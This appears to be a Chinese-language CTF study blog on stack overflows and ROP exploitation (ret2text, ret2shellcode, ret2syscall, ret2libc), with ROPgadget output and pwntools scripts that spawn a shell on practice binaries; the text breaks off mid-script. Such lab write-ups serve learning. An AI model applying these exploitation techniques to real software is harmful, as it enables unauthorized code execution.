<p><img src="C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20220213231828239.png" alt="image-20220213231828239"></p>
<blockquote>
<p>寄存器**%eax、%edx和%ecx**主调函数保存寄存器由主调函数显式的保存到栈中，先于返回地址进入栈中。</p>
<p>寄存器**%ebx、%esi和%edi**被调函数保存寄存器由被调函数保存到栈中，后于返回地址进入栈中。</p>
</blockquote>
<p><strong>栈帧结构</strong></p>
<p><img src="https://images0.cnblogs.com/i/569008/201405/271650059007975.jpg" alt="img"></p>
<blockquote>
<p><strong>实参N<del>1→主调函数返回地址→主调函数帧基指针EBP→被调函数局部变量1</del>N</strong></p>
</blockquote>
<p><strong>堆栈操作</strong></p>
<p>x86平台将参数压入调用栈中。而x86_64平台具有16个通用64位寄存器，故调用函数时前6个参数通常由寄存器传递，其余参数才通过栈传递。</p>
<p>被调函数执行自己任务，此时可能需要访问由主调函数传入的参数。若被调函数返回一个值，该值通常保存在一个指定寄存器中(通常都是EAX)</p>
<h2 id="C语言函数调用栈-二"><a href="#C语言函数调用栈-二" class="headerlink" title="C语言函数调用栈(二)"></a><a target="_blank" rel="noopener" href="https://www.cnblogs.com/clover-toeic/p/3756668.html">C语言函数调用栈(二)</a></h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/clover-toeic/p/3756668.html"><strong>函数调用约定</strong></a></p>
<p>函数通过选择特定的调用约定，来表明其希望以特定方式接收参数。主要有几个方面</p>
<ol>
<li>函数参数的传递顺序和方式</li>
<li>栈的维护方式</li>
<li>名字修饰策略</li>
</ol>
<p><strong>cdecl调用约定</strong></p>
<blockquote>
<p>C调用约定，是C/C++编译器默认的函数调用约定。</p>
<p>函数参数按照从右到左的顺序入栈，函数调用者负责清除栈中的参数，返回值在EAX中。</p>
<p>可以支持可变参数函数，即参数的数量不定。最左边的参数最接近栈顶位置。调用时即使实参和形参数目不符也不会导致堆栈错误</p>
</blockquote>
<p><strong>stdcall调用约定</strong></p>
<blockquote>
<p>WinAPI采用该调用约定</p>
<p>stdcall调用约定主调函数参数从右向左入栈，除指针或引用类型参数外所有参数采用传值方式传递，由被调函数负责清除栈中的参数，返回值在EAX中。</p>
<p>仅适用于参数个数固定的函数，因为被调函数清栈时无法精确获知栈上有多少函数参数；</p>
</blockquote>
<p><strong>x86函数参数传递方法</strong></p>
<blockquote>
<p>x86处理器ABI规范中规定，所有传递给被调函数的参数都通过堆栈来完成，其压栈顺序是以函数参数从右到左的顺序。当向被调函数传递参数时，所有参数最后形成一个数组。由于采用从右到左的压栈顺序，数组中参数的顺序(下标0<del>N-1)与函数参数声明顺序(Para1</del>N)一致。因此，在函数中若知道第一个参数地址和各参数占用字节数，就可通过访问数组的方式去访问每个参数。</p>
</blockquote>
<p>X86_64 中前六个整型或指针参数依次保存在 <strong>RDI, RSI, RDX, RCX, R8 和 R9 寄存器</strong>中，如果还有更多的参数的话才会保存在栈上。</p>
<h2 id="栈溢出原理"><a href="#栈溢出原理" class="headerlink" title="栈溢出原理"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/stackoverflow-basic/">栈溢出原理</a></h2><p>栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞，类似的还有堆溢出，bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃，重则可以使攻击者控制程序执行流程。此外，我们也不难发现，发生栈溢出的基本前提是</p>
<ul>
<li>程序必须向栈上写入数据。</li>
<li>写入的数据大小没有被良好地控制。</li>
</ul>
<p>前提：PIE保护关闭</p>
<p><a target="_blank" rel="noopener" href="http://tttang.com/archive/1361/#toc__1">寻找危险函数</a></p>
<p><a target="_blank" rel="noopener" href="http://tttang.com/archive/1361/#toc__2">确定填充长度</a></p>
<p><img src="C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20220214161648989.png" alt="image-20220214161648989"></p>
<blockquote>
<p>s表示<code>push ebp</code>的地址，r表示函数的返回地址，指定地址应该覆盖r所在的地址</p>
</blockquote>
<h1 id="基本-ROP"><a href="#基本-ROP" class="headerlink" title="基本 ROP"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/"><strong>基本 ROP</strong></a></h1><h2 id="Ret2text"><a href="#Ret2text" class="headerlink" title="Ret2text"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2text">Ret2text</a></h2><h3 id="使用条件"><a href="#使用条件" class="headerlink" title="使用条件"></a>使用条件</h3><p><strong>ret2text的使用条件：程序中存在栈溢出漏洞如gets()函数或者read（）函数。同时存在system（/bin/sh)函数。</strong></p>
<h3 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h3><p>直接通过栈溢出将返回地址替换成system（/bin/sh）函数的地址。</p>
<p><a href="D:\CX_appoincation\Typora\Node\PWN\题目总集"><strong>见题目 BUU pwn1_sctf_2016(Ret2text)</strong></a></p>
<h2 id="Ret2shellcode"><a href="#Ret2shellcode" class="headerlink" title="Ret2shellcode"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2shellcode">Ret2shellcode</a></h2><h3 id="使用条件-1"><a href="#使用条件-1" class="headerlink" title="使用条件"></a>使用条件</h3><p>程序中没有给system（bin/sh)，可以说没有system函数和bin/sh。我们往栈中写入<code>shellcraft.sh()</code>，这是一段代码，包括写入并执行/bin/sh。只要我们能找到能将<code>shellcode()</code>写入并保存到一段<strong>可以执行的段中</strong>，如bss段或者栈，用vmmap查看有没有可执行权限。在根据栈漏洞进入到该段中。</p>
<h3 id="使用方法-1"><a href="#使用方法-1" class="headerlink" title="使用方法"></a>使用方法</h3><p><a href="D:\CX_appoincation\Typora\Node\PWN\题目总集">见题目BUU ciscn_2019_n_5（ret2shellcode）</a></p>
<h3 id="拔高"><a href="#拔高" class="headerlink" title="拔高"></a>拔高</h3><p>如果没有可以执行的bss段，我们可以对一段进行权限修改。只要程序中存在**<code>mprotect</code><strong>函数，见题目</strong><code>BUU get_started_3dsctf_2016</code>**</p>
<p><code>mprotect</code>函数修改内存的权限，指定的内存区间必须包含整个内存页（4K），起始地址 start 必须是一个内存页的起始地址，并且区间长度 len 必须是页大小的整数倍。所以len通常为<code>0x1000</code>，而<code>address</code>一定以000结尾，如<code>0x80EB000</code></p>
<p><strong>地址查询在ida中用<code>ctrl + s </code>命令，可读可写可执行的指令为7</strong></p>
<p>[读取–用数字 4 表示]</p>
<p>[写–用数字 2 表示]</p>
<p>[执行–用数字 1 表示]</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/mcmuyanga/article/details/108274091">https://blog.csdn.net/mcmuyanga/article/details/108274091</a></p>
<h2 id="ret2syscall¶"><a href="#ret2syscall¶" class="headerlink" title="ret2syscall¶"></a>ret2syscall<a target="_blank" rel="noopener" href="https://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2syscall">¶</a></h2><h3 id="原理-¶"><a href="#原理-¶" class="headerlink" title="原理 ¶"></a>原理 <a target="_blank" rel="noopener" href="https://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_6">¶</a></h3><p>ret2syscall，即控制程序执行<strong>系统调用</strong>，获取 shell。</p>
<h3 id="例子-¶"><a href="#例子-¶" class="headerlink" title="例子 ¶"></a>例子 <a target="_blank" rel="noopener" href="https://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_7">¶</a></h3><p>这里我们以 bamboofox 中的 ret2syscall 为例</p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2syscall/bamboofox-ret2syscall/rop">ret2syscall</a></p>
<p>首先检测程序开启的保护</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  ret2syscall checksec rop</span><br><span class="line">    Arch:     i386-32-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x8048000)</span><br></pre></td></tr></table></figure>

<p>可以看出，源程序为 32 位，开启了 NX 保护。接下来利用 IDA 来查看源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">int</span> __cdecl main(<span class="built_in">int</span> argc, const char **argv, const char **envp)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">int</span> v4; // [sp+1Ch] [bp-64h]@<span class="number">1</span></span><br><span class="line"></span><br><span class="line">  setvbuf(stdout, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  setvbuf(stdin, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">  puts(<span class="string">&quot;This time, no system() and NO SHELLCODE!!!&quot;</span>);</span><br><span class="line">  puts(<span class="string">&quot;What do you plan to do?&quot;</span>);</span><br><span class="line">  gets(&amp;v4);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看出此次仍然是一个栈溢出。类似于之前的做法，我们可以获得 v4 相对于 ebp 的偏移为 108。所以我们需要覆盖的返回地址相对于 v4 的偏移为 112。此次，由于我们不能直接利用程序中的某一段代码或者自己填写代码来获得 shell，所以我们利用程序中的 gadgets 来获得 shell，而对应的 shell 获取则是利用系统调用。关于系统调用的知识，请参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://zh.wikipedia.org/wiki/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8">https://zh.wikipedia.org/wiki/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8</a></li>
</ul>
<p>简单地说，只要我们把对应获取 shell 的系统调用的参数放到对应的寄存器中，那么我们在执行 int 0x80 就可执行对应的系统调用。比如说这里我们利用如下系统调用来获取 shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">execve(&quot;/bin/sh&quot;,NULL,NULL)</span><br></pre></td></tr></table></figure>

<p><strong>其中，该程序是 32 位，所以我们需要使得</strong></p>
<ul>
<li><strong>系统调用号，即 eax 应该为 0xb</strong></li>
<li><strong>第一个参数，即 ebx 应该指向 /bin/sh 的地址，其实执行 sh 的地址也可以。</strong></li>
<li><strong>第二个参数，即 ecx 应该为 0</strong></li>
<li><strong>第三个参数，即 edx 应该为 0</strong></li>
</ul>
<p>而我们如何控制这些寄存器的值 呢？这里就需要使用 gadgets。比如说，现在栈顶是 10，那么如果此时执行了 pop eax，那么现在 eax 的值就为 10。但是我们并不能期待有一段连续的代码可以同时控制对应的寄存器，所以我们需要一段一段控制，这也是我们在 gadgets 最后使用 ret 来再次控制程序执行流程的原因。具体寻找 gadgets 的方法，<strong>我们可以使用 ropgadgets 这个工具。</strong></p>
<p>首先，我们来寻找控制 eax 的 gadgets</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  ret2syscall ROPgadget --binary rop  --only &#x27;pop|ret&#x27; | grep &#x27;eax&#x27;</span><br><span class="line">0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x080bb196 : pop eax ; ret</span><br><span class="line">0x0807217a : pop eax ; ret 0x80e</span><br><span class="line">0x0804f704 : pop eax ; ret 3</span><br><span class="line">0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br></pre></td></tr></table></figure>

<p>可以看到有上述几个都可以控制 eax，我选取第二个来作为 gadgets。</p>
<p>类似的，我们可以得到控制其它寄存器的 gadgets</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">➜  ret2syscall ROPgadget --binary rop  --only &#x27;pop|ret&#x27; | grep &#x27;ebx&#x27;</span><br><span class="line">0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret</span><br><span class="line">0x080be23f : pop ebx ; pop edi ; ret</span><br><span class="line">0x0806eb69 : pop ebx ; pop edx ; ret</span><br><span class="line">0x08092258 : pop ebx ; pop esi ; pop ebp ; ret</span><br><span class="line">0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x10</span><br><span class="line">0x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x14</span><br><span class="line">0x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc</span><br><span class="line">0x0805ae81 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4</span><br><span class="line">0x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8</span><br><span class="line">0x08048913 : pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 4</span><br><span class="line">0x08049a94 : pop ebx ; pop esi ; ret</span><br><span class="line">0x080481c9 : pop ebx ; ret</span><br><span class="line">0x080d7d3c : pop ebx ; ret 0x6f9</span><br><span class="line">0x08099c87 : pop ebx ; ret 8</span><br><span class="line">0x0806eb91 : pop ecx ; pop ebx ; ret</span><br><span class="line">0x0806336b : pop edi ; pop esi ; pop ebx ; ret</span><br><span class="line">0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</span><br><span class="line">0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret</span><br><span class="line">0x0805c820 : pop esi ; pop ebx ; ret</span><br><span class="line">0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x0807b6ed : pop ss ; pop ebx ; ret</span><br></pre></td></tr></table></figure>

<p>这里，我选择</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</span><br></pre></td></tr></table></figure>

<p>这个可以直接控制其它三个寄存器。</p>
<p>此外，我们需要获得 /bin/sh 字符串对应的地址。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  ret2syscall ROPgadget --binary rop  --string &#x27;/bin/sh&#x27; </span><br><span class="line">Strings information</span><br><span class="line">============================================================</span><br><span class="line">0x080be408 : /bin/sh</span><br></pre></td></tr></table></figure>

<p>可以找到对应的地址，此外，还有 int 0x80 的地址，如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  ret2syscall ROPgadget --binary rop  --only &#x27;int&#x27;                 </span><br><span class="line">Gadgets information</span><br><span class="line">============================================================</span><br><span class="line">0x08049421 : int 0x80</span><br><span class="line">0x080938fe : int 0xbb</span><br><span class="line">0x080869b5 : int 0xf6</span><br><span class="line">0x0807b4d4 : int 0xfc</span><br><span class="line"></span><br><span class="line">Unique gadgets found: 4</span><br></pre></td></tr></table></figure>

<p>同时，也找到对应的地址了。</p>
<p>下面就是对应的 payload，其中 0xb 为 execve 对应的系统调用号。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./rop&#x27;</span>)</span><br><span class="line"></span><br><span class="line">pop_eax_ret = <span class="number">0x080bb196</span></span><br><span class="line">pop_edx_ecx_ebx_ret = <span class="number">0x0806eb90</span></span><br><span class="line">int_0x80 = <span class="number">0x08049421</span></span><br><span class="line">binsh = <span class="number">0x80be408</span></span><br><span class="line">payload = flat(</span><br><span class="line">    [<span class="string">&#x27;A&#x27;</span> * <span class="number">112</span>, pop_eax_ret, <span class="number">0xb</span>, pop_edx_ecx_ebx_ret, <span class="number">0</span>, <span class="number">0</span>, binsh, int_0x80])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>概括一下ropgadgets的用法</p>
<h3 id="ropgadgets"><a href="#ropgadgets" class="headerlink" title="ropgadgets"></a>ropgadgets</h3><p>我们知道x86都是靠栈来传递参数的而x64换了它顺序是<strong>rdi, rsi, rdx, rcx, r8, r9</strong>(这里6个寄存器可以被理解为Gadgets)如果多于6个参数才会用栈我们要先知道这个特性.</p>
<p>有的题，里面既没有现成的system，也没有/bin/sh字符串，也没有提供libc.so给我们，那么我们要做的就是想办法泄露libc地址，拿到system函数和/bin/sh字符串;</p>
<p>我们就需要获取rdi, rsi, rdx, rcx, r8, r9它们的地址,首先要获取的是rdi的地址;</p>
<p>这就是 ROPgadget 的作用;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#打开寄存器的gadget</span><br><span class="line">ROPgadget --binary 文件名 --only &quot;pop|ret&quot; | grep rdi</span><br><span class="line">ROPgadget --binary 文件名 --only &quot;pop|ret&quot;</span><br><span class="line"></span><br><span class="line">#寻找字符串的地址</span><br><span class="line">ROPgadget --binary 文件名 --string &#x27;/bin/sh&#x27;</span><br><span class="line">ROPgadget --binary 文件名 --string &#x27;/sh&#x27;</span><br><span class="line">ROPgadget --binary 文件名 --string &#x27;sh&#x27;</span><br><span class="line">ROPgadget --binary 文件名 --string &#x27;cat flag&#x27;</span><br><span class="line">ROPgadget --binary 文件名 --string &#x27;cat flag.txt&#x27;</span><br></pre></td></tr></table></figure>

<h3 id="使用条件-2"><a href="#使用条件-2" class="headerlink" title="使用条件"></a><strong>使用条件</strong></h3><p><strong>程序中没有system函数，但是给了/bin/sh字符串。</strong>我们就可以根据要求得到相应得地址，压入相应等值。</p>
<h2 id="Ret2libc"><a href="#Ret2libc" class="headerlink" title="Ret2libc"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2libc">Ret2libc</a></h2><h3 id="GOT表-PLT表"><a href="#GOT表-PLT表" class="headerlink" title="GOT表-PLT表"></a><a target="_blank" rel="noopener" href="http://tttang.com/archive/1361/#toc_0x04-got-plt">GOT表-PLT表</a></h3><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>ret2libc 即控制函数的执行 libc 中的函数，通常是返回至某个<strong>函数的 plt 处或者函数的具体位置</strong> (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system(“/bin/sh”)，故而此时我们需要知道 system 函数的地址。</p>
<p>ret2libc技术是一种缓冲区溢出利用技术，<strong>主要用于克服常规缓冲区溢出漏洞利用技术中面临的no stack executable限制(<strong>所以后续实验还是需要关闭系统的ASLR，以及堆栈保护)，比如PaX和ExecShield安全策略。</strong>该技术主要是通过覆盖栈帧中保存的函数返回地址(eip)，让其定位到libc库中的某个库函数(如，system等)，而不是直接定位到shellcode。</strong>然后通过在栈中精心构造该库函数的参数，以便达到类似于执行shellcode的目的。但是该方案是基于system函数实现的，且在一次攻击中只执行一个libc函数，局限性较大，另外system函数有一个致命的缺陷就是：有时候我们并不能利用它成功获取root权限。</p>
<p>ret2libc 这种攻击方式主要是针对 <strong>动态链接</strong>(Dynamic linking) 编译的程序，因为正常情况下是无法在程序中找到像 system() 、execve() 这种系统级函数(如果程序中直接包含了这种函数就可以直接控制返回地址指向他们，而不用通过这种麻烦的方式)。因为程序是动态链接生成的，所以在程序运行时会调用 libc.so (程序被装载时，动态链接器会将程序所有所需的动态链接库加载至进程空间，libc.so 就是其中最基本的一个)，libc.so 是 linux 下 C 语言库中的运行库glibc 的动态链接版，并且 libc.so 中包含了大量的可以利用的函数，包括 system() 、execve() 等系统级函数，我们可以通过找到这些函数在内存中的地址覆盖掉返回地址来获得当前进程的控制权。通常情况下，我们会选择执行 system(“/bin/sh”) 来打开 shell， 如此就只剩下两个问题：</p>
<ul>
<li>找到 system() 函数的地址；</li>
<li>在内存中找到 “/bin/sh” 这个字符串的地址。</li>
</ul>
<p><strong>payload的典型格式为：【合适大小的溢出字符串】+【system函数地址】+【system函数的返回地址】+【system函数参数】</strong></p>
<p>1、使用libc库中system函数的地址覆盖掉原本的返回地址；这样原函数返回的时候会转而调用system函数。获取system函数的返回地址很简单，只需要使用gdb调试目标程序，在main函数下断点，程序运行中断在断点处后，使用<strong>p system</strong>命令即可:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!bash</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>p system</span><br><span class="line">$<span class="number">1</span> = &#123;&lt;text variable, no debug info&gt;&#125; <span class="number">0xb7e56190</span> &lt;__libc_system&gt;</span><br></pre></td></tr></table></figure>

<p>2、设置system函数返回后的地址，以及为system函数构造我们预定的参数。</p>
<p>难点主要在第2步中system函数相关的栈帧结构的安排上，比如为什么Filler就是Return Address After system，为什么传递给system的参数紧跟在Fillter之后？这就涉及到函数的调用规则。我们知道函数调用在汇编中通过call指令实现，而函数返回则通过ret指令实现。Call指令可以实现多种方式的函数跳转，这里为了简便，暂且只考虑跳转地址在内存中的call指令的实现</p>
<p><strong>CPU在执行call指令时需要进行两步操作：</strong></p>
<ol>
<li><p>将当前的IP(也就是函数返回地址)入栈，即：push IP;跳转，即： jmp dword ptr 内存单元地址。</p>
</li>
<li><p>CPU在执行ret指令时只需要恢复IP寄存器即可，因此ret指令相当于pop IP。</p>
</li>
</ol>
<p>但是由于我们使用system的函数地址替换了原本的IP寄存器，强制执行system函数，破坏了原程序的栈帧分配和释放策略，所以后续的操作必须基于这个被破坏的栈帧结构实现。</p>
<p>ret2libc通常可以分为下面这几类：</p>
<ul>
<li><p>程序中自身就含有system函数和”/bin/sh”字符串</p>
</li>
<li><p>程序中自身就有system函数，但是没有”/bin/sh”字符串</p>
</li>
<li><p>程序中自身就没有system函数和”/bin/sh”字符串，但给出了libc.so文件</p>
</li>
<li><p>程序中自身就没有system函数和”/bin/sh”字符串，并且没有给出libc.so文件</p>
</li>
</ul>
<p><strong>不管程序没有直接给出我们需要条件，我们都要想办法找到system()函数的地址和”/bin/sh”字符串的地址；当程序中没有”/bin/sh”字符串时，我们可以利用程序中某些函数如:read,fgets,gets等函数将”/bin/sh”字符串写入bss段或某个变量中，并且要可以找到其地址；对于只给出了libc.so文件的程序，我们可以直接在libc.so文件当中去找system()函数和”/bin/sh”字符串，因为libc.so文件中也是包含这些了的；最后对于没有给出libc.so文件的程序，我们可以通过泄露出程序当中的某个函数的地址，通过查询来找出其使用lib.so版本是哪一个</strong></p>
<p>我们由简单到难分别给出三个例子。</p>
<h3 id="例-1"><a href="#例-1" class="headerlink" title="例 1"></a><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#1">例 1</a></h3><h4 id="使用条件-3"><a href="#使用条件-3" class="headerlink" title="使用条件"></a><strong>使用条件</strong></h4><p><strong>看到程序中并没有返回/bin/sh的地址，但程序中是有/bin/sh和/system，同时开始了NX栈不可执行保护</strong></p>
<p>当然程序中不一定要有/bin/sh，sh、/sh、cat flag的作用是相同的，只需要用**<code>ROPgadget</code>**命令去查看一下有没有字符串</p>
<h4 id="使用方法-2"><a href="#使用方法-2" class="headerlink" title="使用方法"></a>使用方法</h4><p>我们要做的就是把/bin/sh放到system函数中去。然后调用system函数执行。</p>
<p><a href="D:\CX_appoincation\Typora\Node\PWN\题目总集"><strong>见题目<code>BUU  ciscn_2019_ne_5（ret2libc_1）</code></strong></a></p>
<p>通常标准的EXP为：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2libc1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">binsh_addr = <span class="number">0x8048720</span></span><br><span class="line">system_plt = <span class="number">0x08048460</span></span><br><span class="line">payload = flat([<span class="string">&#x27;a&#x27;</span> * <span class="number">112</span>, system_plt, <span class="string">&#x27;b&#x27;</span> * <span class="number">4</span>, binsh_addr])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>payload解释：</p>
<p>正常情况下，我们是通过call指令进行函数调用的，因此在进入到system函数之前，call指令已经通过push IP将其返回地址push到栈帧中了，所以在正常情况下ret指令pop到 IP的数据就是之前call指令push到栈帧的数据，也就是说两者是成对的。但是！！！在我们的漏洞利用中，直接通过覆盖IP地址跳转到了system函数，而并没有经过call调用，也即是没有push IP的操作，但是system函数却照常进行了ret指令的pop IP操作。那么这个ret指令pop到IP的是哪一处地址的数据呢？在这里因为我们并不考虑system会返回到哪里去，所以我们只需有一个虚假的地址填充在栈中!</p>
<p>在函数返回地址的前面，是调用system函数的参数变量从右往左存放在栈中，system的参数变量就是/bin/sh，那么这里我们需要存放/bin/sh的地址作为参数变量。</p>
<h3 id="例-2¶"><a href="#例-2¶" class="headerlink" title="例 2¶"></a>例 2<a target="_blank" rel="noopener" href="https://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#2">¶</a></h3><p>这里以 bamboofox 中的 ret2libc2 为例</p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2libc/ret2libc2/ret2libc2">ret2libc2</a></p>
<p>该题目与例 1 基本一致，只不过不再出现 /bin/sh 字符串，所以此次需要我们自己来读取字符串，所以我们需要两个 gadgets，第一个控制程序读取字符串，第二个控制程序执行 system(“/bin/sh”)。由于漏洞与上述一致，这里就不在多说，具体的 exp 如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2libc2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">gets_plt = <span class="number">0x08048460</span></span><br><span class="line">system_plt = <span class="number">0x08048490</span></span><br><span class="line">pop_ebx = <span class="number">0x0804843d</span></span><br><span class="line">buf2 = <span class="number">0x804a080</span></span><br><span class="line">payload = flat(</span><br><span class="line">    [<span class="string">&#x27;a&#x27;</span> * <span class="number">112</span>, gets_plt, pop_ebx, buf2, system_plt, <span class="number">0xdeadbeef</span>, buf2])</span><br><span 